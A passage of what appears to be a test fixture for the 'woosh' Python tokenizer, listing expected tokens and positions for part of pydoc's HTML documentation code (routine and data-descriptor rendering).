woosh.Token(woosh.DEDENT, '', 1035, 12, 1035, 12),
woosh.Token(woosh.NAME, 'else', 1035, 12, 1035, 16),
woosh.Token(woosh.OP, ':', 1035, 16, 1035, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1035, 17, 1036, 0),
woosh.Token(woosh.INDENT, ' ', 1036, 0, 1036, 16),
woosh.Token(woosh.NAME, 'if', 1036, 16, 1036, 18),
woosh.Token(woosh.NAME, 'object', 1036, 19, 1036, 25),
woosh.Token(woosh.OP, '.', 1036, 25, 1036, 26),
woosh.Token(woosh.NAME, '__self__', 1036, 26, 1036, 34),
woosh.Token(woosh.NAME, 'is', 1036, 35, 1036, 37),
woosh.Token(woosh.NAME, 'not', 1036, 38, 1036, 41),
woosh.Token(woosh.NAME, 'None', 1036, 42, 1036, 46),
woosh.Token(woosh.OP, ':', 1036, 46, 1036, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1036, 47, 1037, 0),
woosh.Token(woosh.INDENT, ' ', 1037, 0, 1037, 20),
woosh.Token(woosh.NAME, 'note', 1037, 20, 1037, 24),
woosh.Token(woosh.OP, '=', 1037, 25, 1037, 26),
woosh.Token(woosh.STRING, "' method of %s instance'", 1037, 27, 1037, 51),
woosh.Token(woosh.OP, '%', 1037, 52, 1037, 53),
woosh.Token(woosh.NAME, 'self', 1037, 54, 1037, 58),
woosh.Token(woosh.OP, '.', 1037, 58, 1037, 59),
woosh.Token(woosh.NAME, 'classlink', 1037, 59, 1037, 68),
woosh.Token(woosh.OP, '(', 1037, 68, 1037, 69),
woosh.Token(woosh.NAME, 'object', 1038, 24, 1038, 30),
woosh.Token(woosh.OP, '.', 1038, 30, 1038, 31),
woosh.Token(woosh.NAME, '__self__', 1038, 31, 1038, 39),
woosh.Token(woosh.OP, '.', 1038, 39, 1038, 40),
woosh.Token(woosh.NAME, '__class__', 1038, 40, 1038, 49),
woosh.Token(woosh.OP, ',', 1038, 49, 1038, 50),
woosh.Token(woosh.NAME, 'mod', 1038, 51, 1038, 54),
woosh.Token(woosh.OP, ')', 1038, 54, 1038, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1038, 55, 1039, 0),
woosh.Token(woosh.DEDENT, ' ', 1039, 0, 1039, 16),
woosh.Token(woosh.NAME, 'else', 1039, 16, 1039, 20),
woosh.Token(woosh.OP, ':', 1039, 20, 1039, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1039, 21, 1040, 0),
woosh.Token(woosh.INDENT, ' ', 1040, 0, 1040, 20),
woosh.Token(woosh.NAME, 'note', 1040, 20, 1040, 24),
woosh.Token(woosh.OP, '=', 1040, 25, 1040, 26),
woosh.Token(woosh.STRING, "' unbound %s method'", 1040, 27, 1040, 47),
woosh.Token(woosh.OP, '%', 1040, 48, 1040, 49),
woosh.Token(woosh.NAME, 'self', 1040, 50, 1040, 54),
woosh.Token(woosh.OP, '.', 1040, 54, 1040, 55),
woosh.Token(woosh.NAME, 'classlink', 1040, 55, 1040, 64),
woosh.Token(woosh.OP, '(', 1040, 64, 1040, 65),
woosh.Token(woosh.NAME, 'imclass', 1040, 65, 1040, 72),
woosh.Token(woosh.OP, ',', 1040, 72, 1040, 73),
woosh.Token(woosh.NAME, 'mod', 1040, 73, 1040, 76),
woosh.Token(woosh.OP, ')', 1040, 76, 1040, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1040, 77, 1041, 0),
woosh.Token(woosh.DEDENT, ' ', 1042, 0, 1042, 8),
woosh.Token(woosh.DEDENT, '', 1042, 8, 1042, 8),
woosh.Token(woosh.DEDENT, '', 1042, 8, 1042, 8),
woosh.Token(woosh.NAME, 'if', 1042, 8, 1042, 10),
woosh.Token(woosh.OP, '(', 1042, 11, 1042, 12),
woosh.Token(woosh.NAME, 'inspect', 1042, 12, 1042, 19),
woosh.Token(woosh.OP, '.', 1042, 19, 1042, 20),
woosh.Token(woosh.NAME, 'iscoroutinefunction', 1042, 20, 1042, 39),
woosh.Token(woosh.OP, '(', 1042, 39, 1042, 40),
woosh.Token(woosh.NAME, 'object', 1042, 40, 1042, 46),
woosh.Token(woosh.OP, ')', 1042, 46, 1042, 47),
woosh.Token(woosh.NAME, 'or', 1042, 48, 1042, 50),
woosh.Token(woosh.NAME, 'inspect', 1043, 16, 1043, 23),
woosh.Token(woosh.OP, '.', 1043, 23, 1043, 24),
woosh.Token(woosh.NAME, 'isasyncgenfunction', 1043, 24, 1043, 42),
woosh.Token(woosh.OP, '(', 1043, 42, 1043, 43),
woosh.Token(woosh.NAME, 'object', 1043, 43, 1043, 49),
woosh.Token(woosh.OP, ')', 1043, 49, 1043, 50),
woosh.Token(woosh.OP, ')', 1043, 50, 1043, 51),
woosh.Token(woosh.OP, ':', 1043, 51, 1043, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1043, 52, 1044, 0),
woosh.Token(woosh.INDENT, ' ', 1044, 0, 1044, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1044, 12, 1044, 26),
woosh.Token(woosh.OP, '=', 1044, 27, 1044, 28),
woosh.Token(woosh.STRING, "'async '", 1044, 29, 1044, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1044, 37, 1045, 0),
woosh.Token(woosh.DEDENT, ' ', 1045, 0, 1045, 8),
woosh.Token(woosh.NAME, 'else', 1045, 8, 1045, 12),
woosh.Token(woosh.OP, ':', 1045, 12, 1045, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1045, 13, 1046, 0),
woosh.Token(woosh.INDENT, ' ', 1046, 0, 1046, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1046, 12, 1046, 26),
woosh.Token(woosh.OP, '=', 1046, 27, 1046, 28),
woosh.Token(woosh.STRING, "''", 1046, 29, 1046, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1046, 31, 1047, 0),
woosh.Token(woosh.DEDENT, ' ', 1048, 0, 1048, 8),
woosh.Token(woosh.NAME, 'if', 1048, 8, 1048, 10),
woosh.Token(woosh.NAME, 'name', 1048, 11, 1048, 15),
woosh.Token(woosh.OP, '==', 1048, 16, 1048, 18),
woosh.Token(woosh.NAME, 'realname', 1048, 19, 1048, 27),
woosh.Token(woosh.OP, ':', 1048, 27, 1048, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1048, 28, 1049, 0),
woosh.Token(woosh.INDENT, ' ', 1049, 0, 1049, 12),
woosh.Token(woosh.NAME, 'title', 1049, 12, 1049, 17),
woosh.Token(woosh.OP, '=', 1049, 18, 1049, 19),
woosh.Token(woosh.STRING, '\'<a name="%s"><strong>%s</strong></a>\'', 1049, 20, 1049, 58),
woosh.Token(woosh.OP, '%', 1049, 59, 1049, 60),
woosh.Token(woosh.OP, '(', 1049, 61, 1049, 62),
woosh.Token(woosh.NAME, 'anchor', 1049, 62, 1049, 68),
woosh.Token(woosh.OP, ',', 1049, 68, 1049, 69),
woosh.Token(woosh.NAME, 'realname', 1049, 70, 1049, 78),
woosh.Token(woosh.OP, ')', 1049, 78, 1049, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 1049, 79, 1050, 0),
woosh.Token(woosh.DEDENT, ' ', 1050, 0, 1050, 8),
woosh.Token(woosh.NAME, 'else', 1050, 8, 1050, 12),
woosh.Token(woosh.OP, ':', 1050, 12, 1050, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1050, 13, 1051, 0),
woosh.Token(woosh.INDENT, ' ', 1051, 0, 1051, 12),
woosh.Token(woosh.NAME, 'if', 1051, 12, 1051, 14),
woosh.Token(woosh.NAME, 'cl', 1051, 15, 1051, 17),
woosh.Token(woosh.NAME, 'and', 1051, 18, 1051, 21),
woosh.Token(woosh.NAME, 'inspect', 1051, 22, 1051, 29),
woosh.Token(woosh.OP, '.', 1051, 29, 1051, 30),
woosh.Token(woosh.NAME, 'getattr_static', 1051, 30, 1051, 44),
woosh.Token(woosh.OP, '(', 1051, 44, 1051, 45),
woosh.Token(woosh.NAME, 'cl', 1051, 45, 1051, 47),
woosh.Token(woosh.OP, ',', 1051, 47, 1051, 48),
woosh.Token(woosh.NAME, 'realname', 1051, 49, 1051, 57),
woosh.Token(woosh.OP, ',', 1051, 57, 1051, 58),
woosh.Token(woosh.OP, '[', 1051, 59, 1051, 60),
woosh.Token(woosh.OP, ']', 1051, 60, 1051, 61),
woosh.Token(woosh.OP, ')', 1051, 61, 1051, 62),
woosh.Token(woosh.NAME, 'is', 1051, 63, 1051, 65),
woosh.Token(woosh.NAME, 'object', 1051, 66, 1051, 72),
woosh.Token(woosh.OP, ':', 1051, 72, 1051, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1051, 73, 1052, 0),
woosh.Token(woosh.INDENT, ' ', 1052, 0, 1052, 16),
woosh.Token(woosh.NAME, 'reallink', 1052, 16, 1052, 24),
woosh.Token(woosh.OP, '=', 1052, 25, 1052, 26),
woosh.Token(woosh.STRING, '\'<a href="#%s">%s</a>\'', 1052, 27, 1052, 49),
woosh.Token(woosh.OP, '%', 1052, 50, 1052, 51),
woosh.Token(woosh.OP, '(', 1052, 52, 1052, 53),
woosh.Token(woosh.NAME, 'cl', 1053, 20, 1053, 22),
woosh.Token(woosh.OP, '.', 1053, 22, 1053, 23),
woosh.Token(woosh.NAME, '__name__', 1053, 23, 1053, 31),
woosh.Token(woosh.OP, '+', 1053, 32, 1053, 33),
woosh.Token(woosh.STRING, "'-'", 1053, 34, 1053, 37),
woosh.Token(woosh.OP, '+', 1053, 38, 1053, 39),
woosh.Token(woosh.NAME, 'realname', 1053, 40, 1053, 48),
woosh.Token(woosh.OP, ',', 1053, 48, 1053, 49),
woosh.Token(woosh.NAME, 'realname', 1053, 50, 1053, 58),
woosh.Token(woosh.OP, ')', 1053, 58, 1053, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1053, 59, 1054, 0),
woosh.Token(woosh.NAME, 'skipdocs', 1054, 16, 1054, 24),
woosh.Token(woosh.OP, '=', 1054, 25, 1054, 26),
woosh.Token(woosh.NUMBER, '1', 1054, 27, 1054, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1054, 28, 1055, 0),
woosh.Token(woosh.DEDENT, ' ', 1055, 0, 1055, 12),
woosh.Token(woosh.NAME, 'else', 1055, 12, 1055, 16),
woosh.Token(woosh.OP, ':', 1055, 16, 1055, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1055, 17, 1056, 0),
woosh.Token(woosh.INDENT, ' ', 1056, 0, 1056, 16),
woosh.Token(woosh.NAME, 'reallink', 1056, 16, 1056, 24),
woosh.Token(woosh.OP, '=', 1056, 25, 1056, 26),
woosh.Token(woosh.NAME, 'realname', 1056, 27, 1056, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1056, 35, 1057, 0),
woosh.Token(woosh.DEDENT, ' ', 1057, 0, 1057, 12),
woosh.Token(woosh.NAME, 'title', 1057, 12, 1057, 17),
woosh.Token(woosh.OP, '=', 1057, 18, 1057, 19),
woosh.Token(woosh.STRING, '\'<a name="%s"><strong>%s</strong></a> = %s\'', 1057, 20, 1057, 63),
woosh.Token(woosh.OP, '%', 1057, 64, 1057, 65),
woosh.Token(woosh.OP, '(', 1057, 66, 1057, 67),
woosh.Token(woosh.NAME, 'anchor', 1058, 16, 1058, 22),
woosh.Token(woosh.OP, ',', 1058, 22, 1058, 23),
woosh.Token(woosh.NAME, 'name', 1058, 24, 1058, 28),
woosh.Token(woosh.OP, ',', 1058, 28, 1058, 29),
woosh.Token(woosh.NAME, 'reallink', 1058, 30, 1058, 38),
woosh.Token(woosh.OP, ')', 1058, 38, 1058, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1058, 39, 1059, 0),
woosh.Token(woosh.DEDENT, ' ', 1059, 0, 1059, 8),
woosh.Token(woosh.NAME, 'argspec', 1059, 8, 1059, 15),
woosh.Token(woosh.OP, '=', 1059, 16, 1059, 17),
woosh.Token(woosh.NAME, 'None', 1059, 18, 1059, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1059, 22, 1060, 0),
woosh.Token(woosh.NAME, 'if', 1060, 8, 1060, 10),
woosh.Token(woosh.NAME, 'inspect', 1060, 11, 1060, 18),
woosh.Token(woosh.OP, '.', 1060, 18, 1060, 19),
woosh.Token(woosh.NAME, 'isroutine', 1060, 19, 1060, 28),
woosh.Token(woosh.OP, '(', 1060, 28, 1060, 29),
woosh.Token(woosh.NAME, 'object', 1060, 29, 1060, 35),
woosh.Token(woosh.OP, ')', 1060, 35, 1060, 36),
woosh.Token(woosh.OP, ':', 1060, 36, 1060, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1060, 37, 1061, 0),
woosh.Token(woosh.INDENT, ' ', 1061, 0, 1061, 12),
woosh.Token(woosh.NAME, 'try', 1061, 12, 1061, 15),
woosh.Token(woosh.OP, ':', 1061, 15, 1061, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1061, 16, 1062, 0),
woosh.Token(woosh.INDENT, ' ', 1062, 0, 1062, 16),
woosh.Token(woosh.NAME, 'signature', 1062, 16, 1062, 25),
woosh.Token(woosh.OP, '=', 1062, 26, 1062, 27),
woosh.Token(woosh.NAME, 'inspect', 1062, 28, 1062, 35),
woosh.Token(woosh.OP, '.', 1062, 35, 1062, 36),
woosh.Token(woosh.NAME, 'signature', 1062, 36, 1062, 45),
woosh.Token(woosh.OP, '(', 1062, 45, 1062, 46),
woosh.Token(woosh.NAME, 'object', 1062, 46, 1062, 52),
woosh.Token(woosh.OP, ')', 1062, 52, 1062, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1062, 53, 1063, 0),
woosh.Token(woosh.DEDENT, ' ', 1063, 0, 1063, 12),
woosh.Token(woosh.NAME, 'except', 1063, 12, 1063, 18),
woosh.Token(woosh.OP, '(', 1063, 19, 1063, 20),
woosh.Token(woosh.NAME, 'ValueError', 1063, 20, 1063, 30),
woosh.Token(woosh.OP, ',', 1063, 30, 1063, 31),
woosh.Token(woosh.NAME, 'TypeError', 1063, 32, 1063, 41),
woosh.Token(woosh.OP, ')', 1063, 41, 1063, 42),
woosh.Token(woosh.OP, ':', 1063, 42, 1063, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1063, 43, 1064, 0),
woosh.Token(woosh.INDENT, ' ', 1064, 0, 1064, 16),
woosh.Token(woosh.NAME, 'signature', 1064, 16, 1064, 25),
woosh.Token(woosh.OP, '=', 1064, 26, 1064, 27),
woosh.Token(woosh.NAME, 'None', 1064, 28, 1064, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1064, 32, 1065, 0),
woosh.Token(woosh.DEDENT, ' ', 1065, 0, 1065, 12),
woosh.Token(woosh.NAME, 'if', 1065, 12, 1065, 14),
woosh.Token(woosh.NAME, 'signature', 1065, 15, 1065, 24),
woosh.Token(woosh.OP, ':', 1065, 24, 1065, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1065, 25, 1066, 0),
woosh.Token(woosh.INDENT, ' ', 1066, 0, 1066, 16),
woosh.Token(woosh.NAME, 'argspec', 1066, 16, 1066, 23),
woosh.Token(woosh.OP, '=', 1066, 24, 1066, 25),
woosh.Token(woosh.NAME, 'str', 1066, 26, 1066, 29),
woosh.Token(woosh.OP, '(', 1066, 29, 1066, 30),
woosh.Token(woosh.NAME, 'signature', 1066, 30, 1066, 39),
woosh.Token(woosh.OP, ')', 1066, 39, 1066, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1066, 40, 1067, 0),
woosh.Token(woosh.NAME, 'if', 1067, 16, 1067, 18),
woosh.Token(woosh.NAME, 'realname', 1067, 19, 1067, 27),
woosh.Token(woosh.OP, '==', 1067, 28, 1067, 30),
woosh.Token(woosh.STRING, "'<lambda>'", 1067, 31, 1067, 41),
woosh.Token(woosh.OP, ':', 1067, 41, 1067, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1067, 42, 1068, 0),
woosh.Token(woosh.INDENT, ' ', 1068, 0, 1068, 20),
woosh.Token(woosh.NAME, 'title', 1068, 20, 1068, 25),
woosh.Token(woosh.OP, '=', 1068, 26, 1068, 27),
woosh.Token(woosh.STRING, "'<strong>%s</strong> <em>lambda</em> '", 1068, 28, 1068, 66),
woosh.Token(woosh.OP, '%', 1068, 67, 1068, 68),
woosh.Token(woosh.NAME, 'name', 1068, 69, 1068, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1068, 73, 1069, 0),
woosh.Token(woosh.COMMENT, "# XXX lambda's won't usually have func_annotations['return']", 1069, 20, 1069, 80),
woosh.Token(woosh.COMMENT, "# since the syntax doesn't support but it is possible.", 1070, 20, 1070, 74),
woosh.Token(woosh.COMMENT, "# So removing parentheses isn't truly safe.", 1071, 20, 1071, 63),
woosh.Token(woosh.NAME, 'argspec', 1072, 20, 1072, 27),
woosh.Token(woosh.OP, '=', 1072, 28, 1072, 29),
woosh.Token(woosh.NAME, 'argspec', 1072, 30, 1072, 37),
woosh.Token(woosh.OP, '[', 1072, 37, 1072, 38),
woosh.Token(woosh.NUMBER, '1', 1072, 38, 1072, 39),
woosh.Token(woosh.OP, ':', 1072, 39, 1072, 40),
woosh.Token(woosh.OP, '-', 1072, 40, 1072, 41),
woosh.Token(woosh.NUMBER, '1', 1072, 41, 1072, 42),
woosh.Token(woosh.OP, ']', 1072, 42, 1072, 43),
woosh.Token(woosh.COMMENT, '# remove parentheses', 1072, 44, 1072, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1072, 64, 1073, 0),
woosh.Token(woosh.DEDENT, ' ', 1073, 0, 1073, 8),
woosh.Token(woosh.DEDENT, '', 1073, 8, 1073, 8),
woosh.Token(woosh.DEDENT, '', 1073, 8, 1073, 8),
woosh.Token(woosh.NAME, 'if', 1073, 8, 1073, 10),
woosh.Token(woosh.NAME, 'not', 1073, 11, 1073, 14),
woosh.Token(woosh.NAME, 'argspec', 1073, 15, 1073, 22),
woosh.Token(woosh.OP, ':', 1073, 22, 1073, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1073, 23, 1074, 0),
woosh.Token(woosh.INDENT, ' ', 1074, 0, 1074, 12),
woosh.Token(woosh.NAME, 'argspec', 1074, 12, 1074, 19),
woosh.Token(woosh.OP, '=', 1074, 20, 1074, 21),
woosh.Token(woosh.STRING, "'(...)'", 1074, 22, 1074, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1074, 29, 1075, 0),
woosh.Token(woosh.DEDENT, ' ', 1076, 0, 1076, 8),
woosh.Token(woosh.NAME, 'decl', 1076, 8, 1076, 12),
woosh.Token(woosh.OP, '=', 1076, 13, 1076, 14),
woosh.Token(woosh.NAME, 'asyncqualifier', 1076, 15, 1076, 29),
woosh.Token(woosh.OP, '+', 1076, 30, 1076, 31),
woosh.Token(woosh.NAME, 'title', 1076, 32, 1076, 37),
woosh.Token(woosh.OP, '+', 1076, 38, 1076, 39),
woosh.Token(woosh.NAME, 'self', 1076, 40, 1076, 44),
woosh.Token(woosh.OP, '.', 1076, 44, 1076, 45),
woosh.Token(woosh.NAME, 'escape', 1076, 45, 1076, 51),
woosh.Token(woosh.OP, '(', 1076, 51, 1076, 52),
woosh.Token(woosh.NAME, 'argspec', 1076, 52, 1076, 59),
woosh.Token(woosh.OP, ')', 1076, 59, 1076, 60),
woosh.Token(woosh.OP, '+', 1076, 61, 1076, 62),
woosh.Token(woosh.OP, '(', 1076, 63, 1076, 64),
woosh.Token(woosh.NAME, 'note', 1076, 64, 1076, 68),
woosh.Token(woosh.NAME, 'and', 1076, 69, 1076, 72),
woosh.Token(woosh.NAME, 'self', 1077, 15, 1077, 19),
woosh.Token(woosh.OP, '.', 1077, 19, 1077, 20),
woosh.Token(woosh.NAME, 'grey', 1077, 20, 1077, 24),
woosh.Token(woosh.OP, '(', 1077, 24, 1077, 25),
woosh.Token(woosh.STRING, '\'<font face="helvetica, arial">%s</font>\'', 1077, 25, 1077, 66),
woosh.Token(woosh.OP, '%', 1077, 67, 1077, 68),
woosh.Token(woosh.NAME, 'note', 1077, 69, 1077, 73),
woosh.Token(woosh.OP, ')', 1077, 73, 1077, 74),
woosh.Token(woosh.OP, ')', 1077, 74, 1077, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1077, 75, 1078, 0),
woosh.Token(woosh.NAME, 'if', 1079, 8, 1079, 10),
woosh.Token(woosh.NAME, 'skipdocs', 1079, 11, 1079, 19),
woosh.Token(woosh.OP, ':', 1079, 19, 1079, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1079, 20, 1080, 0),
woosh.Token(woosh.INDENT, ' ', 1080, 0, 1080, 12),
woosh.Token(woosh.NAME, 'return', 1080, 12, 1080, 18),
woosh.Token(woosh.STRING, "'<dl><dt>%s</dt></dl>\\n'", 1080, 19, 1080, 43),
woosh.Token(woosh.OP, '%', 1080, 44, 1080, 45),
woosh.Token(woosh.NAME, 'decl', 1080, 46, 1080, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1080, 50, 1081, 0),
woosh.Token(woosh.DEDENT, ' ', 1081, 0, 1081, 8),
woosh.Token(woosh.NAME, 'else', 1081, 8, 1081, 12),
woosh.Token(woosh.OP, ':', 1081, 12, 1081, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1081, 13, 1082, 0),
woosh.Token(woosh.INDENT, ' ', 1082, 0, 1082, 12),
woosh.Token(woosh.NAME, 'doc', 1082, 12, 1082, 15),
woosh.Token(woosh.OP, '=', 1082, 16, 1082, 17),
woosh.Token(woosh.NAME, 'self', 1082, 18, 1082, 22),
woosh.Token(woosh.OP, '.', 1082, 22, 1082, 23),
woosh.Token(woosh.NAME, 'markup', 1082, 23, 1082, 29),
woosh.Token(woosh.OP, '(', 1082, 29, 1082, 30),
woosh.Token(woosh.NAME, 'getdoc', 1083, 16, 1083, 22),
woosh.Token(woosh.OP, '(', 1083, 22, 1083, 23),
woosh.Token(woosh.NAME, 'object', 1083, 23, 1083, 29),
woosh.Token(woosh.OP, ')', 1083, 29, 1083, 30),
woosh.Token(woosh.OP, ',', 1083, 30, 1083, 31),
woosh.Token(woosh.NAME, 'self', 1083, 32, 1083, 36),
woosh.Token(woosh.OP, '.', 1083, 36, 1083, 37),
woosh.Token(woosh.NAME, 'preformat', 1083, 37, 1083, 46),
woosh.Token(woosh.OP, ',', 1083, 46, 1083, 47),
woosh.Token(woosh.NAME, 'funcs', 1083, 48, 1083, 53),
woosh.Token(woosh.OP, ',', 1083, 53, 1083, 54),
woosh.Token(woosh.NAME, 'classes', 1083, 55, 1083, 62),
woosh.Token(woosh.OP, ',', 1083, 62, 1083, 63),
woosh.Token(woosh.NAME, 'methods', 1083, 64, 1083, 71),
woosh.Token(woosh.OP, ')', 1083, 71, 1083, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1083, 72, 1084, 0),
woosh.Token(woosh.NAME, 'doc', 1084, 12, 1084, 15),
woosh.Token(woosh.OP, '=', 1084, 16, 1084, 17),
woosh.Token(woosh.NAME, 'doc', 1084, 18, 1084, 21),
woosh.Token(woosh.NAME, 'and', 1084, 22, 1084, 25),
woosh.Token(woosh.STRING, "'<dd><tt>%s</tt></dd>'", 1084, 26, 1084, 48),
woosh.Token(woosh.OP, '%', 1084, 49, 1084, 50),
woosh.Token(woosh.NAME, 'doc', 1084, 51, 1084, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1084, 54, 1085, 0),
woosh.Token(woosh.NAME, 'return', 1085, 12, 1085, 18),
woosh.Token(woosh.STRING, "'<dl><dt>%s</dt>%s</dl>\\n'", 1085, 19, 1085, 45),
woosh.Token(woosh.OP, '%', 1085, 46, 1085, 47),
woosh.Token(woosh.OP, '(', 1085, 48, 1085, 49),
woosh.Token(woosh.NAME, 'decl', 1085, 49, 1085, 53),
woosh.Token(woosh.OP, ',', 1085, 53, 1085, 54),
woosh.Token(woosh.NAME, 'doc', 1085, 55, 1085, 58),
woosh.Token(woosh.OP, ')', 1085, 58, 1085, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1085, 59, 1086, 0),
woosh.Token(woosh.DEDENT, ' ', 1087, 0, 1087, 4),
woosh.Token(woosh.DEDENT, '', 1087, 4, 1087, 4),
woosh.Token(woosh.NAME, 'def', 1087, 4, 1087, 7),
woosh.Token(woosh.NAME, 'docdata', 1087, 8, 1087, 15),
woosh.Token(woosh.OP, '(', 1087, 15, 1087, 16),
woosh.Token(woosh.NAME, 'self', 1087, 16, 1087, 20),
woosh.Token(woosh.OP, ',', 1087, 20, 1087, 21),
woosh.Token(woosh.NAME, 'object', 1087, 22, 1087, 28),
woosh.Token(woosh.OP, ',', 1087, 28, 1087, 29),
woosh.Token(woosh.NAME, 'name', 1087, 30, 1087, 34),
woosh.Token(woosh.OP, '=', 1087, 34, 1087, 35),
woosh.Token(woosh.NAME, 'None', 1087, 35, 1087, 39),
woosh.Token(woosh.OP, ',', 1087, 39, 1087, 40),
woosh.Token(woosh.NAME, 'mod', 1087, 41, 1087, 44),
woosh.Token(woosh.OP, '=', 1087, 44, 1087, 45),
woosh.Token(woosh.NAME, 'None', 1087, 45, 1087, 49),
woosh.Token(woosh.OP, ',', 1087, 49, 1087, 50),
woosh.Token(woosh.NAME, 'cl', 1087, 51, 1087, 53),
woosh.Token(woosh.OP, '=', 1087, 53, 1087, 54),
woosh.Token(woosh.NAME, 'None', 1087, 54, 1087, 58),
woosh.Token(woosh.OP, ')', 1087, 58, 1087, 59),
woosh.Token(woosh.OP, ':', 1087, 59, 1087, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1087, 60, 1088, 0),
woosh.Token(woosh.INDENT, ' ', 1088, 0, 1088, 8),
woosh.Token(woosh.STRING, '"""Produce html documentation for a data descriptor."""', 1088, 8, 1088, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1088, 63, 1089, 0),
woosh.Token(woosh.NAME, 'results', 1089, 8, 1089, 15),
woosh.Token(woosh.OP, '=', 1089, 16, 1089, 17),
woosh.Token(woosh.OP, '[', 1089, 18, 1089, 19),
woosh.Token(woosh.OP, ']', 1089, 19, 1089, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1089, 20, 1090, 0),
woosh.Token(woosh.NAME, 'push', 1090, 8, 1090, 12),
woosh.Token(woosh.OP, '=', 1090, 13, 1090, 14),
woosh.Token(woosh.NAME, 'results', 1090, 15, 1090, 22),
woosh.Token(woosh.OP, '.', 1090, 22, 1090, 23),
woosh.Token(woosh.NAME, 'append', 1090, 23, 1090, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1090, 29, 1091, 0),
woosh.Token(woosh.NAME, 'if', 1092, 8, 1092, 10),
woosh.Token(woosh.NAME, 'name', 1092, 11, 1092, 15),
woosh.Token(woosh.OP, ':', 1092, 15, 1092, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1092, 16, 1093, 0),
woosh.Token(woosh.INDENT, ' ', 1093, 0, 1093, 12),
woosh.Token(woosh.NAME, 'push', 1093, 12, 1093, 16),
woosh.Token(woosh.OP, '(', 1093, 16, 1093, 17),
woosh.Token(woosh.STRING, "'<dl><dt><strong>%s</strong></dt>\\n'", 1093, 17, 1093, 53),
woosh.Token(woosh.OP, '%', 1093, 54, 1093, 55),
woosh.Token(woosh.NAME, 'name', 1093, 56, 1093, 60),
woosh.Token(woosh.OP, ')', 1093, 60, 1093, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1093, 61, 1094, 0),
woosh.Token(woosh.DEDENT, ' ', 1094, 0, 1094, 8),
woosh.Token(woosh.NAME, 'doc', 1094, 8, 1094, 11),
woosh.Token(woosh.OP, '=', 1094, 12, 1094, 13),
woosh.Token(woosh.NAME, 'self', 1094, 14, 1094, 18),
woosh.Token(woosh.OP, '.', 1094, 18, 1094, 19),
woosh.Token(woosh.NAME, 'markup', 1094, 19, 1094, 25),
woosh.Token(woosh.OP, '(', 1094, 25, 1094, 26),
woosh.Token(woosh.NAME, 'getdoc', 1094, 26, 1094, 32),
woosh.Token(woosh.OP, '(', 1094, 32, 1094, 33),
woosh.Token(woosh.NAME, 'object', 1094, 33, 1094, 39),
woosh.Token(woosh.OP, ')', 1094, 39, 1094, 40),
woosh.Token(woosh.OP, ',', 1094, 40, 1094, 41),
woosh.Token(woosh.NAME, 'self', 1094, 42, 1094, 46),
woosh.Token(woosh.OP, '.', 1094, 46, 1094, 47),
woosh.Token(woosh.NAME, 'preformat', 1094, 47, 1094, 56),
woosh.Token(woosh.OP, ')', 1094, 56, 1094, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1094, 57, 1095, 0),
woosh.Token(woosh.NAME, 'if', 1095, 8, 1095, 10),
woosh.Token(woosh.NAME, 'doc', 1095, 11, 1095, 14),
woosh.Token(woosh.OP, ':', 1095, 14, 1095, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1095, 15, 1096, 0),
woosh.Token(woosh.INDENT, ' ', 1096, 0, 1096, 12),
woosh.Token(woosh.NAME, 'push', 1096, 12, 1096, 16),
woosh.Token(woosh.OP, '(', 1096, 16, 1096, 17),
woosh.Token(woosh.STRING, "'<dd><tt>%s</tt></dd>\\n'", 1096, 17, 1096, 41),
woosh.Token(woosh.OP, '%', 1096, 42, 1096, 43),
woosh.Token(woosh.NAME, 'doc', 1096, 44, 1096, 47),
woosh.Token(woosh.OP, ')', 1096, 47, 1096, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1096, 48, 1097, 0),
woosh.Token(woosh.DEDENT, ' ', 1097, 0, 1097, 8),
woosh.Token(woosh.NAME, 'push', 1097, 8, 1097, 12),
woosh.Token(woosh.OP, '(', 1097, 12, 1097, 13),
woosh.Token(woosh.STRING, "'</dl>\\n'", 1097, 13, 1097, 22),
woosh.Token(woosh.OP, ')', 1097, 22, 1097, 23),
